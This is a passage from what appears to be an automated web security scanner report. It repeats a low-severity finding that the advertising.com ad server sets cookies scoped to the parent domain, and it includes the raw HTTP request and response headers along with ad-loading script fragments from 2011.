Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BMlU63EBAAAABAAAAgBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
BASE=x7Q9hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlC!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
ROLL=U6APRjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:27 GMT; path=/
61218373=_4dfa5253,2384205386,768033^1022301^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308250706036&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; F1=BAlU63EBAAAABAAAAcBA6BA; BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; F1=BswS63EBAAAABAAAAABAGCA; BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004266.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 683
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/314453502/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
F1=B4fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251645602&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; F1=BcMV63EBAAAABAAAAsBA2BA; BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1021113.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:14:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 596
Date: Thu, 16 Jun 2011 19:14:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: F1=B4fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: 63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N884.AOL-Advertising/B5043385.2;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXActiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvG7Gt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD70AMyNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NeGo6Nl6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
74200963=_4dfa5736,7160602726,768033^894882^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251958214&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; F1=B4fV63EBAAAABAAAAwBA0BA; 